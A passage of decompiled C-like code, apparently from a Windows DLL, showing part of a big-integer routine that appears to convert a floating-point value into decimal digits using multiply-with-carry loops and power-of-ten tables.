													_t1064 = _t1056 - 1;
													_v1872 = _t1276;
													_v1868 = _t1064;
													__eflags = _t1064 - _t1276;
													if(_t1064 != _t1276) {
														_t1280 = _t1064 - _t1180;
														__eflags = _t1280;
														_t1183 =  &(( &_v472)[_t1280]);
														_v1892 = _t1183;
														while(1) {
															__eflags = _t1280 - _t1236;
															if(_t1280 >= _t1236) {
																_t1068 = 0;
																__eflags = 0;
															} else {
																_t1068 = _t1183[1];
															}
															_v1880 = _t1068;
															_t156 = _t1280 - 1; // -4
															__eflags = _t156 - _t1236;
															if(_t156 >= _t1236) {
																_t1070 = 0;
																__eflags = 0;
															} else {
																_t1070 =  *_t1183;
															}
															_t1186 = _v1868;
															 *(_t1313 + _t1186 * 4 - 0x1d0) = (_t1070 & _v1884) >> _v1920 | (_v1880 & _v1912) << _v1876;
															_t1075 = _t1186 - 1;
															_t1183 = _v1892 - 4;
															_v1868 = _t1075;
															_t1280 = _t1280 - 1;
															_v1892 = _t1183;
															__eflags = _t1075 - _v1872;
															if(_t1075 == _v1872) {
																break;
															}
															_t1236 = _v472;
														}
														_t1180 = _v1900;
													}
													__eflags = _t1180;
													if(_t1180 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1180 << 2);
														_t1317 =  &(_t1317[3]);
													}
													_v472 = _v1908;
												}
											} else {
												L57:
												_v1400 = 0;
												_v472 = 0;
												E6E463CE9( &_v468, _t1297,  &_v1396, 0);
												_t1317 =  &(_t1317[4]);
											}
											_v1396 = 2;
											_push(4);
										} else {
											_t1188 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1313 + _t1188 - 0x570)) -  *((intOrPtr*)(_t1313 + _t1188 - 0x1d0));
												if( *((intOrPtr*)(_t1313 + _t1188 - 0x570)) !=  *((intOrPtr*)(_t1313 + _t1188 - 0x1d0))) {
													goto L53;
												}
												_t1188 = _t1188 + 4;
												__eflags = _t1188 - 8;
												if(_t1188 != 8) {
													continue;
												} else {
													_t1189 = _t1204 - 0x431;
													_t1190 = _t1189 & 0x0000001f;
													_v1880 = _t1189 >> 5;
													_v1900 = _t1190;
													_v1872 = _t1250 - _t1190;
													_t1081 = E6E46ABF0(_t1111, _t1250 - _t1190, 0);
													_t1241 = _v1892;
													_t1082 = _t1081 - 1;
													_t68 =  &_v1884;
													 *_t68 = _v1884 & 0x00000000;
													__eflags =  *_t68;
													_v1908 = _t1082;
													_t1083 =  !_t1082;
													_v1912 = _t1083;
													asm("bsr eax, ecx");
													if( *_t68 == 0) {
														_t76 =  &_v1876;
														 *_t76 = _v1876 & 0x00000000;
														__eflags =  *_t76;
													} else {
														_v1876 = _t1083 + 1;
													}
													_t1193 = _v1880;
													_t1297 = 0x1cc;
													_t1084 = _t1241 + _t1193;
													__eflags = _t1084 - 0x73;
													if(_t1084 <= 0x73) {
														__eflags = _t1250 - _v1876 - _v1900;
														asm("sbb eax, eax");
														_t1087 =  ~_t1084 + _t1241 + _t1193;
														_v1884 = _t1087;
														__eflags = _t1087 - 0x73;
														if(_t1087 > 0x73) {
															goto L35;
														} else {
															_t1282 = _t1193 - 1;
															_t1093 = _t1087 - 1;
															_v1920 = _t1282;
															_v1868 = _t1093;
															__eflags = _t1093 - _t1282;
															if(_t1093 != _t1282) {
																_t1286 = _t1093 - _t1193;
																__eflags = _t1286;
																_t1196 =  &(( &_v472)[_t1286]);
																_v1892 = _t1196;
																while(1) {
																	__eflags = _t1286 - _t1241;
																	if(_t1286 >= _t1241) {
																		_t1097 = 0;
																		__eflags = 0;
																	} else {
																		_t1097 = _t1196[1];
																	}
																	_v1876 = _t1097;
																	_t96 = _t1286 - 1; // -4
																	__eflags = _t96 - _t1241;
																	if(_t96 >= _t1241) {
																		_t1099 = 0;
																		__eflags = 0;
																	} else {
																		_t1099 =  *_t1196;
																	}
																	_t1199 = _v1868;
																	 *(_t1313 + _t1199 * 4 - 0x1d0) = (_t1099 & _v1912) >> _v1872 | (_v1876 & _v1908) << _v1900;
																	_t1104 = _t1199 - 1;
																	_t1196 = _v1892 - 4;
																	_v1868 = _t1104;
																	_t1286 = _t1286 - 1;
																	_v1892 = _t1196;
																	__eflags = _t1104 - _v1920;
																	if(_t1104 == _v1920) {
																		break;
																	}
																	_t1241 = _v472;
																}
																_t1193 = _v1880;
															}
															__eflags = _t1193;
															if(_t1193 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1193 << 2);
																_t1317 =  &(_t1317[3]);
															}
															_v472 = _v1884;
														}
													} else {
														L35:
														_v1400 = 0;
														_v472 = 0;
														E6E463CE9( &_v468, _t1297,  &_v1396, 0);
														_t1317 =  &(_t1317[4]);
													}
													_t1092 = 4;
													_v1396 = _t1092;
													_push(_t1092);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_v1392 = _v1392 & 0x00000000;
										_push( &_v1396);
										_v936 = _t1111;
										_push(_t1297);
										_push( &_v932);
										_v1400 = _t1111;
										E6E463CE9();
										_t1321 =  &(_t1317[4]);
									}
									_t852 = _v1904;
									_t1141 = 0xa;
									_v1912 = _t1141;
									__eflags = _t852;
									if(_t852 < 0) {
										_t853 =  ~_t852;
										_t854 = _t853 / _t1141;
										_v1892 = _t854;
										_t1142 = _t853 % _t1141;
										_v1920 = _t1142;
										__eflags = _t854;
										if(_t854 == 0) {
											L246:
											__eflags = _t1142;
											if(_t1142 != 0) {
												_t900 =  *(0x6e47137c + _t1142 * 4);
												_v1884 = _t900;
												__eflags = _t900;
												if(_t900 == 0) {
													L258:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L259;
												} else {
													__eflags = _t900 - _t1111;
													if(_t900 != _t1111) {
														_t1152 = _v472;
														__eflags = _t1152;
														if(_t1152 != 0) {
															_v1872 = _v1872 & 0x00000000;
															_t1259 = 0;
															__eflags = 0;
															do {
																_t1218 = _t900 *  *(_t1313 + _t1259 * 4 - 0x1d0) >> 0x20;
																 *(_t1313 + _t1259 * 4 - 0x1d0) = _t900 *  *(_t1313 + _t1259 * 4 - 0x1d0) + _v1872;
																_t900 = _v1884;
																asm("adc edx, 0x0");
																_t1259 = _t1259 + 1;
																_v1872 = _t1218;
																__eflags = _t1259 - _t1152;
															} while (_t1259 != _t1152);
															__eflags = _t1218;
															if(_t1218 != 0) {
																_t907 = _v472;
																__eflags = _t907 - 0x73;
																if(_t907 >= 0x73) {
																	goto L258;
																} else {
																	 *(_t1313 + _t907 * 4 - 0x1d0) = _t1218;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t854 - 0x26;
												if(_t854 > 0x26) {
													_t854 = 0x26;
												}
												_t1153 =  *(0x6e4712e6 + _t854 * 4) & 0x000000ff;
												_v1900 = _t854;
												_v1400 = ( *(0x6e4712e6 + _t854 * 4) & 0x000000ff) + ( *(0x6e4712e7 + _t854 * 4) & 0x000000ff);
												E6E45B880(_t1153 << 2,  &_v1396, 0, _t1153 << 2);
												_t918 = E6E45BA40( &(( &_v1396)[_t1153]), 0x6e4709e0 + ( *(0x6e4712e4 + _v1900 * 4) & 0x0000ffff) * 4, ( *(0x6e4712e7 + _t854 * 4) & 0x000000ff) << 2);
												_t1262 = _v1400;
												_t1321 =  &(_t1321[6]);
												__eflags = _t1262 - _t1111;
												if(_t1262 > _t1111) {
													__eflags = _v472 - _t1111;
													if(_v472 > _t1111) {
														__eflags = _t1262 - _v472;
														_t1219 =  &_v1396;
														_t548 = _t1262 - _v472 > 0;
														__eflags = _t548;
														_t919 = _t918 & 0xffffff00 | _t548;
														if(_t548 >= 0) {
															_t1219 =  &_v468;
														}
														_v1876 = _t1219;
														_t1154 =  &_v468;
														__eflags = _t919;
														if(_t919 == 0) {
															_t1154 =  &_v1396;
														}
														_v1872 = _t1154;
														__eflags = _t919;
														if(_t919 == 0) {
															_t1155 = _v472;
															_v1880 = _t1155;
														} else {
															_t1155 = _t1262;
															_v1880 = _t1262;
														}
														__eflags = _t919;
														if(_t919 != 0) {
															_t1262 = _v472;
														}
														_t920 = 0;
														_t1299 = 0;
														_v1864 = 0;
														__eflags = _t1155;
														if(_t1155 == 0) {
															L240:
															_v472 = _t920;
															_t1297 = 0x1cc;
															_t921 = _t920 << 2;
															__eflags = _t921;
															_push(_t921);
															_t922 =  &_v1860;
															goto L241;
														} else {
															do {
																__eflags =  *(_t1219 + _t1299 * 4);
																if( *(_t1219 + _t1299 * 4) != 0) {
																	_t1222 = 0;
																	_t1156 = _t1299;
																	_v1868 = _v1868 & 0;
																	_v1908 = 0;
																	__eflags = _t1262;
																	if(_t1262 == 0) {
																		L237:
																		__eflags = _t1156 - 0x73;
																		if(_t1156 == 0x73) {
																			goto L255;
																		} else {
																			_t1155 = _v1880;
																			_t1219 = _v1876;
																			goto L239;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1156 - 0x73;
																			if(_t1156 == 0x73) {
																				goto L232;
																			}
																			__eflags = _t1156 - _t920;
																			if(_t1156 == _t920) {
																				 *(_t1313 + _t1156 * 4 - 0x740) =  *(_t1313 + _t1156 * 4 - 0x740) & 0x00000000;
																				_t940 = _v1868 + 1 + _t1299;
																				__eflags = _t940;
																				_v1864 = _t940;
																			}
																			_t933 =  *(_v1872 + _v1868 * 4);
																			_t1224 = _v1876;
																			_t1222 = _t933 *  *(_t1224 + _t1299 * 4) >> 0x20;
																			asm("adc edx, 0x0");
																			 *(_t1313 + _t1156 * 4 - 0x740) =  *(_t1313 + _t1156 * 4 - 0x740) + _t933 *  *(_t1224 + _t1299 * 4) + _v1908;
																			asm("adc edx, 0x0");
																			_t937 = _v1868 + 1;
																			_t1156 = _t1156 + 1;
																			_v1868 = _t937;
																			__eflags = _t937 - _t1262;
																			_v1908 = _t1222;
																			_t920 = _v1864;
																			if(_t937 != _t1262) {
																				continue;
																			} else {
																				goto L232;
																			}
																			while(1) {
																				L232:
																				__eflags = _t1222;
																				if(_t1222 == 0) {
																					goto L237;
																				}
																				__eflags = _t1156 - 0x73;
																				if(_t1156 == 0x73) {
																					L255:
																					_t1297 = 0x1cc;
																					goto L256;
																				} else {
																					__eflags = _t1156 - _t920;
																					if(_t1156 == _t920) {
																						_t604 = _t1313 + _t1156 * 4 - 0x740;
																						 *_t604 =  *(_t1313 + _t1156 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t604;
																						_t610 = _t1156 + 1; // 0x1
																						_v1864 = _t610;
																					}
																					_t931 = _t1222;
																					_t1222 = 0;
																					 *(_t1313 + _t1156 * 4 - 0x740) =  *(_t1313 + _t1156 * 4 - 0x740) + _t931;
																					_t920 = _v1864;
																					asm("adc edx, edx");
																					_t1156 = _t1156 + 1;
																					continue;
																				}
																				goto L243;
																			}
																			goto L237;
																		}
																		goto L232;
																	}
																} else {
																	__eflags = _t1299 - _t920;
																	if(_t1299 == _t920) {
																		 *(_t1313 + _t1299 * 4 - 0x740) =  *(_t1313 + _t1299 * 4 - 0x740) & 0x00000000;
																		_t567 = _t1299 + 1; // 0x1
																		_t920 = _t567;
																		_v1864 = _t920;
																	}
																	goto L239;
																}
																goto L243;
																L239:
																_t1299 = _t1299 + 1;
																__eflags = _t1299 - _t1155;
															} while (_t1299 != _t1155);
															goto L240;
														}
													} else {
														_t1297 = 0x1cc;
														_v1872 = _v468;
														_v472 = _t1262;
														E6E463CE9( &_v468, 0x1cc,  &_v1396, _t1262 << 2);
														_t948 = _v1872;
														_t1321 =  &(_t1321[4]);
														__eflags = _t948;
														if(_t948 != 0) {
															__eflags = _t948 - _t1111;
															if(_t948 == _t1111) {
																goto L242;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L242;
																} else {
																	_v1884 = _v472;
																	_t1158 = 0;
																	_t1263 = 0;
																	__eflags = 0;
																	do {
																		_t1220 = _t948 *  *(_t1313 + _t1263 * 4 - 0x1d0) >> 0x20;
																		 *(_t1313 + _t1263 * 4 - 0x1d0) = _t948 *  *(_t1313 + _t1263 * 4 - 0x1d0) + _t1158;
																		_t948 = _v1872;
																		asm("adc edx, 0x0");
																		_t1263 = _t1263 + 1;
																		_t1158 = _t1220;
																		__eflags = _t1263 - _v1884;
																	} while (_t1263 != _v1884);
																	__eflags = _t1158;
																	if(_t1158 == 0) {
																		goto L242;
																	} else {
																		_t951 = _v472;
																		__eflags = _t951 - 0x73;
																		if(_t951 >= 0x73) {
																			L256:
																			_v2408 = 0;
																			_v472 = 0;
																			E6E463CE9( &_v468, _t1297,  &_v2404, 0);
																			_t1321 =  &(_t1321[4]);
																			_t925 = 0;
																		} else {
																			 *(_t1313 + _t951 * 4 - 0x1d0) = _t1158;
																			_v472 = _v472 + 1;
																			goto L242;
																		}
																	}
																}
															}
														} else {
															_v2408 = _t948;
															_v472 = _t948;
															_push(_t948);
															_t922 =  &_v2404;
															L241:
															_push(_t922);
															_push(_t1297);
															_push( &_v468);
															E6E463CE9();
															_t1321 =  &(_t1321[4]);
															L242:
															_t925 = _t1111;
														}
													}
												} else {
													_t1264 = _v1396;
													__eflags = _t1264;
													if(_t1264 != 0) {
														__eflags = _t1264 - _t1111;
														if(_t1264 == _t1111) {
															goto L194;
														} else {
															__eflags = _v472;
															if(_v472 == 0) {
																goto L194;
															} else {
																_t1159 = 0;
																_v1884 = _v472;
																_t1300 = 0;
																__eflags = 0;
																do {
																	_t953 = _t1264;
																	_t1221 = _t953 *  *(_t1313 + _t1300 * 4 - 0x1d0) >> 0x20;
																	 *(_t1313 + _t1300 * 4 - 0x1d0) = _t953 *  *(_t1313 + _t1300 * 4 - 0x1d0) + _t1159;
																	asm("adc edx, 0x0");
																	_t1300 = _t1300 + 1;
																	_t1159 = _t1221;
																	__eflags = _t1300 - _v1884;
																} while (_t1300 != _v1884);
																__eflags = _t1159;
																if(_t1159 == 0) {
																	goto L194;
																} else {
																	_t956 = _v472;
																	__eflags = _t956 - 0x73;
																	if(_t956 >= 0x73) {
																		_v2408 = 0;
																		_v472 = 0;
																		E6E463CE9( &_v468, 0x1cc,  &_v2404, 0);
																		_t1321 =  &(_t1321[4]);
																		_t925 = 0;
																		goto L195;
																	} else {
																		 *(_t1313 + _t956 * 4 - 0x1d0) = _t1159;
																		_v472 = _v472 + 1;
																		goto L194;
																	}
																}
															}
														}
														goto L261;
													} else {
														__eflags = 0;
														_v2408 = 0;
														_v472 = 0;
														E6E463CE9( &_v468, 0x1cc,  &_v2404, 0);
														_t1321 =  &(_t1321[4]);
														L194:
														_t925 = _t1111;
													}
													L195:
													_t1297 = 0x1cc;
												}
												L243:
												__eflags = _t925;
												if(_t925 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_v472 = _v472 & 0x00000000;
													_push(0);
													L259:
													_push( &_v2404);
													_t903 =  &_v468;
													goto L260;
												} else {
													goto L244;
												}
												goto L261;
												L244:
												_t854 = _v1892 - _v1900;
												__eflags = _t854;
												_v1892 = _t854;
											} while (_t854 != 0);
											_t1142 = _v1920;
											goto L246;
										}
									} else {
										_t965 = _t852 / _t1141;
										_v1872 = _t965;
										_t1160 = _t852 % _t1141;
										_v1920 = _t1160;
										__eflags = _t965;
										if(_t965 == 0) {
											L174:
											__eflags = _t1160;
											if(_t1160 != 0) {
												_t966 =  *(0x6e47137c + _t1160 * 4);
												_v1884 = _t966;
												__eflags = _t966;
												if(_t966 != 0) {
													__eflags = _t966 - _t1111;
													if(_t966 != _t1111) {
														_t1161 = _v936;
														__eflags = _t1161;
														if(_t1161 != 0) {
															_v1872 = _v1872 & 0x00000000;
															_t1265 = 0;
															__eflags = 0;
															do {
																_t1226 = _t966 *  *(_t1313 + _t1265 * 4 - 0x3a0) >> 0x20;
																 *(_t1313 + _t1265 * 4 - 0x3a0) = _t966 *  *(_t1313 + _t1265 * 4 - 0x3a0) + _v1872;
																_t966 = _v1884;
																asm("adc edx, 0x0");
																_t1265 = _t1265 + 1;
																_v1872 = _t1226;
																__eflags = _t1265 - _t1161;
															} while (_t1265 != _t1161);
															__eflags = _t1226;
															if(_t1226 != 0) {
																_t969 = _v936;
																__eflags = _t969 - 0x73;
																if(_t969 >= 0x73) {
																	goto L176;
																} else {
																	 *(_t1313 + _t969 * 4 - 0x3a0) = _t1226;
																	_v936 = _v936 + 1;
																}
															}
														}
													}
												} else {
													L176:
													_v2408 = 0;
													_v936 = 0;
													_push(0);
													goto L180;
												}
											}
										} else {
											do {
												__eflags = _t965 - 0x26;
												if(_t965 > 0x26) {
													_t965 = 0x26;
												}
												_t1162 =  *(0x6e4712e6 + _t965 * 4) & 0x000000ff;
												_v1876 = _t965;
												_v1400 = ( *(0x6e4712e6 + _t965 * 4) & 0x000000ff) + ( *(0x6e4712e7 + _t965 * 4) & 0x000000ff);
												E6E45B880(_t1162 << 2,  &_v1396, 0, _t1162 << 2);
												_t982 = E6E45BA40( &(( &_v1396)[_t1162]), 0x6e4709e0 + ( *(0x6e4712e4 + _v1876 * 4) & 0x0000ffff) * 4, ( *(0x6e4712e7 + _t965 * 4) & 0x000000ff) << 2);
												_t1268 = _v1400;
												_t1321 =  &(_t1321[6]);
												__eflags = _t1268 - _t1111;
												if(_t1268 > _t1111) {
													__eflags = _v936 - _t1111;
													if(_v936 > _t1111) {
														__eflags = _t1268 - _v936;
														_t1227 =  &_v1396;
														_t338 = _t1268 - _v936 > 0;
														__eflags = _t338;
														_t983 = _t982 & 0xffffff00 | _t338;
														if(_t338 >= 0) {
															_t1227 =  &_v932;
														}
														_v1900 = _t1227;
														_t1163 =  &_v932;
														__eflags = _t983;
														if(_t983 == 0) {
															_t1163 =  &_v1396;
														}
														_v1880 = _t1163;
														__eflags = _t983;
														if(_t983 == 0) {
															_t1164 = _v936;
															_v1908 = _t1164;
														} else {
															_t1164 = _t1268;
															_v1908 = _t1268;
														}
														__eflags = _t983;
														if(_t983 != 0) {
															_t1268 = _v936;
														}
														_t984 = 0;
														_t1302 = 0;
														_v1864 = 0;
														__eflags = _t1164;
														if(_t1164 == 0) {
															L168:
															_v936 = _t984;
															_t1297 = 0x1cc;
															_t985 = _t984 << 2;
															__eflags = _t985;
															_push(_t985);
															_t986 =  &_v1860;
															goto L169;
														} else {
															do {
																__eflags =  *(_t1227 + _t1302 * 4);
																if( *(_t1227 + _t1302 * 4) != 0) {
																	_t1230 = 0;
																	_t1165 = _t1302;
																	_v1868 = _v1868 & 0;
																	_v1892 = 0;
																	__eflags = _t1268;
																	if(_t1268 == 0) {
																		L165:
																		__eflags = _t1165 - 0x73;
																		if(_t1165 == 0x73) {
																			goto L177;
																		} else {
																			_t1164 = _v1908;
																			_t1227 = _v1900;
																			goto L167;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1165 - 0x73;
																			if(_t1165 == 0x73) {
																				goto L160;
																			}
																			__eflags = _t1165 - _t984;
																			if(_t1165 == _t984) {
																				 *(_t1313 + _t1165 * 4 - 0x740) =  *(_t1313 + _t1165 * 4 - 0x740) & 0x00000000;
																				_t1004 = _v1868 + 1 + _t1302;
																				__eflags = _t1004;
																				_v1864 = _t1004;
																			}
																			_t997 =  *(_v1880 + _v1868 * 4);
																			_t1232 = _v1900;
																			_t1230 = _t997 *  *(_t1232 + _t1302 * 4) >> 0x20;
																			asm("adc edx, 0x0");
																			 *(_t1313 + _t1165 * 4 - 0x740) =  *(_t1313 + _t1165 * 4 - 0x740) + _t997 *  *(_t1232 + _t1302 * 4) + _v1892;
																			asm("adc edx, 0x0");
																			_t1001 = _v1868 + 1;
																			_t1165 = _t1165 + 1;
																			_v1868 = _t1001;
																			__eflags = _t1001 - _t1268;
																			_v1892 = _t1230;
																			_t984 = _v1864;
																			if(_t1001 != _t1268) {
																				continue;
																			} else {
																				goto L160;
																			}
																			while(1) {
																				L160:
																				__eflags = _t1230;
																				if(_t1230 == 0) {
																					goto L165;
																				}
																				__eflags = _t1165 - 0x73;
																				if(_t1165 == 0x73) {
																					L177:
																					__eflags = 0;
																					_t1297 = 0x1cc;
																					_v2408 = 0;
																					_v936 = 0;
																					_push(0);
																					_t992 =  &_v2404;
																					goto L178;
																				} else {
																					__eflags = _t1165 - _t984;
																					if(_t1165 == _t984) {
																						_t394 = _t1313 + _t1165 * 4 - 0x740;
																						 *_t394 =  *(_t1313 + _t1165 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t394;
																						_t400 = _t1165 + 1; // 0x1
																						_v1864 = _t400;
																					}
																					_t995 = _t1230;
																					_t1230 = 0;
																					 *(_t1313 + _t1165 * 4 - 0x740) =  *(_t1313 + _t1165 * 4 - 0x740) + _t995;
																					_t984 = _v1864;
																					asm("adc edx, edx");
																					_t1165 = _t1165 + 1;
																					continue;
																				}
																				goto L171;
																			}
																			goto L165;
																		}
																		goto L160;
																	}
																} else {
																	__eflags = _t1302 - _t984;
																	if(_t1302 == _t984) {
																		 *(_t1313 + _t1302 * 4 - 0x740) =  *(_t1313 + _t1302 * 4 - 0x740) & 0x00000000;
																		_t357 = _t1302 + 1; // 0x1
																		_t984 = _t357;
																		_v1864 = _t984;
																	}
																	goto L167;
																}
																goto L171;
																L167:
																_t1302 = _t1302 + 1;
																__eflags = _t1302 - _t1164;
															} while (_t1302 != _t1164);
															goto L168;
														}
													} else {
														_t1297 = 0x1cc;
														_v1880 = _v932;
														_v936 = _t1268;
														E6E463CE9( &_v932, 0x1cc,  &_v1396, _t1268 << 2);
														_t1012 = _v1880;
														_t1321 =  &(_t1321[4]);
														__eflags = _t1012;
														if(_t1012 != 0) {
															__eflags = _t1012 - _t1111;
															if(_t1012 == _t1111) {
																goto L170;
															} else {
																__eflags = _v936;
																if(_v936 == 0) {
																	goto L170;
																} else {
																	_v1884 = _v936;
																	_t1167 = 0;
																	_t1269 = 0;
																	__eflags = 0;
																	do {
																		_t1228 = _t1012 *  *(_t1313 + _t1269 * 4 - 0x3a0) >> 0x20;
																		 *(_t1313 + _t1269 * 4 - 0x3a0) = _t1012 *  *(_t1313 + _t1269 * 4 - 0x3a0) + _t1167;
																		_t1012 = _v1880;
																		asm("adc edx, 0x0");
																		_t1269 = _t1269 + 1;
																		_t1167 = _t1228;
																		__eflags = _t1269 - _v1884;
																	} while (_t1269 != _v1884);
																	__eflags = _t1167;
																	if(_t1167 == 0) {
																		goto L170;
																	} else {
																		_t1015 = _v936;
																		__eflags = _t1015 - 0x73;
																		if(_t1015 >= 0x73) {
																			_v1400 = 0;
																			_v936 = 0;
																			_push(0);
																			_t992 =  &_v1396;
																			L178:
																			_push(_t992);
																			_push(_t1297);
																			_push( &_v932);
																			E6E463CE9();
																			_t1321 =  &(_t1321[4]);
																			_t989 = 0;
																		} else {
																			 *(_t1313 + _t1015 * 4 - 0x3a0) = _t1167;
																			_v936 = _v936 + 1;
																			goto L170;
																		}
																	}
																}
															}
														} else {
															_v1400 = _t1012;
															_v936 = _t1012;
															_push(_t1012);
															_t986 =  &_v1396;
															L169:
															_push(_t986);
															_push(_t1297);
															_push( &_v932);
															E6E463CE9();
															_t1321 =  &(_t1321[4]);
															L170:
															_t989 = _t1111;
														}
													}
												} else {
													_t1270 = _v1396;
													__eflags = _t1270;
													if(_t1270 != 0) {
														__eflags = _t1270 - _t1111;
														if(_t1270 == _t1111) {
															goto L121;
														} else {
															__eflags = _v936;
															if(_v936 == 0) {
																goto L121;
															} else {
																_t1168 = 0;
																_v1884 = _v936;
																_t1303 = 0;
																__eflags = 0;
																do {
																	_t1018 = _t1270;
																	_t1229 = _t1018 *  *(_t1313 + _t1303 * 4 - 0x3a0) >> 0x20;
																	 *(_t1313 + _t1303 * 4 - 0x3a0) = _t1018 *  *(_t1313 + _t1303 * 4 - 0x3a0) + _t1168;
																	asm("adc edx, 0x0");
																	_t1303 = _t1303 + 1;
																	_t1168 = _t1229;
																	__eflags = _t1303 - _v1884;
																} while (_t1303 != _v1884);
																__eflags = _t1168;
																if(_t1168 == 0) {
																	goto L121;
																} else {
																	_t1021 = _v936;
																	__eflags = _t1021 - 0x73;
																	if(_t1021 >= 0x73) {
																		_v1400 = 0;
																		_v936 = 0;
																		E6E463CE9( &_v932, 0x1cc,  &_v1396, 0);
																		_t1321 =  &(_t1321[4]);
																		_t989 = 0;
																		goto L122;
																	} else {
																		 *(_t1313 + _t1021 * 4 - 0x3a0) = _t1168;
																		_v936 = _v936 + 1;
																		goto L121;
																	}
																}
															}
														}
														goto L261;
													} else {
														__eflags = 0;
														_v1864 = 0;
														_v936 = 0;
														E6E463CE9( &_v932, 0x1cc,  &_v1860, 0);
														_t1321 =  &(_t1321[4]);
														L121:
														_t989 = _t1111;
													}
													L122:
													_t1297 = 0x1cc;
												}
												L171:
												__eflags = _t989;
												if(_t989 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_t429 =  &_v936;
													 *_t429 = _v936 & 0x00000000;
													__eflags =  *_t429;
													_push(0);
													L180:
													_push( &_v2404);
													_t903 =  &_v932;
													L260:
													_push(_t1297);
													_push(_t903);
													E6E463CE9();
													_t1321 =  &(_t1321[4]);
												} else {
													goto L172;
												}
												goto L261;
												L172:
												_t965 = _v1872 - _v1876;
												__eflags = _t965;
												_v1872 = _t965;
											} while (_t965 != 0);
											_t1160 = _v1920;
											goto L174;
										}
									}
									L261:
									_t1143 = _v472;
									_t1254 = _v1896;
									_v1868 = _t1254;
									__eflags = _t1143;
									if(_t1143 != 0) {
										_v1872 = _v1872 & 0x00000000;
										_t1258 = 0;
										__eflags = 0;
										do {
											_t892 =  *(_t1313 + _t1258 * 4 - 0x1d0);
											_t1216 = 0xa;
											_t1217 = _t892 * _t1216 >> 0x20;
											 *(_t1313 + _t1258 * 4 - 0x1d0) = _t892 * _t1216 + _v1872;
											asm("adc edx, 0x0");
											_t1258 = _t1258 + 1;
											_v1872 = _t1217;
											__eflags = _t1258 - _t1143;
										} while (_t1258 != _t1143);
										_t1254 = _v1868;
										__eflags = _t1217;
										if(_t1217 != 0) {
											_t895 = _v472;
											__eflags = _t895 - 0x73;
											if(_t895 >= 0x73) {
												__eflags = 0;
												_v2408 = 0;
												_v472 = 0;
												E6E463CE9( &_v468, _t1297,  &_v2404, 0);
												_t1321 =  &(_t1321[4]);
											} else {
												 *(_t1313 + _t895 * 4 - 0x1d0) = _t1217;
												_v472 = _v472 + 1;
											}
										}
									}
									_t857 = E6E465E60( &_v472,  &_v936);
									_t1127 = _v1896;
									_t1208 = 0xa;
									__eflags = _t857 - _t1208;
									if(_t857 != _t1208) {
										__eflags = _t857;
										if(_t857 != 0) {
											_t1254 = _t1127 + 1;
											 *_t1127 = _t857 + 0x30;
											_v1868 = _t1254;
											goto L276;
										} else {
											_t859 = _v1904 - 1;
											goto L277;
										}
										goto L308;
									} else {
										_t883 = _v936;
										_t1254 = _t1127 + 1;
										_v1904 = _v1904 + 1;
										 *_t1127 = 0x31;
										_v1868 = _t1254;
										_v1884 = _t883;
										__eflags = _t883;
										if(_t883 != 0) {
											_t1257 = 0;
											_t1150 = 0;
											__eflags = 0;
											do {
												_t884 =  *(_t1313 + _t1150 * 4 - 0x3a0);
												 *(_t1313 + _t1150 * 4 - 0x3a0) = _t884 * _t1208 + _t1257;
												asm("adc edx, 0x0");
												_t1150 = _t1150 + 1;
												_t1257 = _t884 * _t1208 >> 0x20;
												_t1208 = 0xa;
												__eflags = _t1150 - _v1884;
											} while (_t1150 != _v1884);
											_v1884 = _t1257;
											__eflags = _t1257;
											_t1254 = _v1868;
											if(_t1257 != 0) {
												_t1151 = _v936;
												__eflags = _t1151 - 0x73;
												if(_t1151 >= 0x73) {
													_v2408 = 0;
													_v936 = 0;
													E6E463CE9( &_v932, _t1297,  &_v2404, 0);
													_t1321 =  &(_t1321[4]);
												} else {
													 *((intOrPtr*)(_t1313 + _t1151 * 4 - 0x3a0)) = _v1884;
													_t723 =  &_v936;
													 *_t723 = _v936 + 1;
													__eflags =  *_t723;
												}
											}
											_t1127 = _v1896;
										}
										L276:
										_t859 = _v1904;
									}
									L277:
									 *((intOrPtr*)(_v1928 + 4)) = _t859;
									_t1202 = _v1916;
									__eflags = _t859;
									if(_t859 >= 0) {
										__eflags = _t1202 - 0x7fffffff;
										if(_t1202 <= 0x7fffffff) {
											_t1202 = _t1202 + _t859;
											__eflags = _t1202;
										}
									}
									_t861 = _a24 - 1;
									__eflags = _t861 - _t1202;
									if(_t861 >= _t1202) {
										_t861 = _t1202;
									}
									_t862 = _t861 + _t1127;
									_v1872 = _t862;
									__eflags = _t1254 - _t862;
									if(_t1254 != _t862) {
										while(1) {
											_t865 = _v472;
											__eflags = _t865;
											if(_t865 == 0) {
												goto L302;
											}
											_t1117 = 0;
											_t1255 = _t865;
											_t1146 = 0;
											__eflags = 0;
											do {
												_t866 =  *(_t1313 + _t1146 * 4 - 0x1d0);
												 *(_t1313 + _t1146 * 4 - 0x1d0) = _t866 * 0x3b9aca00 + _t1117;
												asm("adc edx, 0x0");
												_t1146 = _t1146 + 1;
												_t1117 = _t866 * 0x3b9aca00 >> 0x20;
												__eflags = _t1146 - _t1255;
											} while (_t1146 != _t1255);
											_t1256 = _v1868;
											__eflags = _t1117;
											if(_t1117 != 0) {
												_t877 = _v472;
												__eflags = _t877 - 0x73;
												if(_t877 >= 0x73) {
													__eflags = 0;
													_v2408 = 0;
													_v472 = 0;
													E6E463CE9( &_v468, _t1297,  &_v2404, 0);
													_t1321 =  &(_t1321[4]);
												} else {
													 *(_t1313 + _t877 * 4 - 0x1d0) = _t1117;
													_v472 = _v472 + 1;
												}
											}
											_t871 = E6E465E60( &_v472,  &_v936);
											__eflags = _v472;
											_t1111 = _t1117 & 0xffffff00 | _v472 == 0x00000000;
											_v1916 = 8;
											_t1127 = _v1872 - _t1256;
											__eflags = _t1127;
											do {
												_t1213 = _t871 % _v1912;
												_v1920 = _t871 / _v1912;
												_v1884 = _t1213;
												_t874 = _t1213 + 0x30;
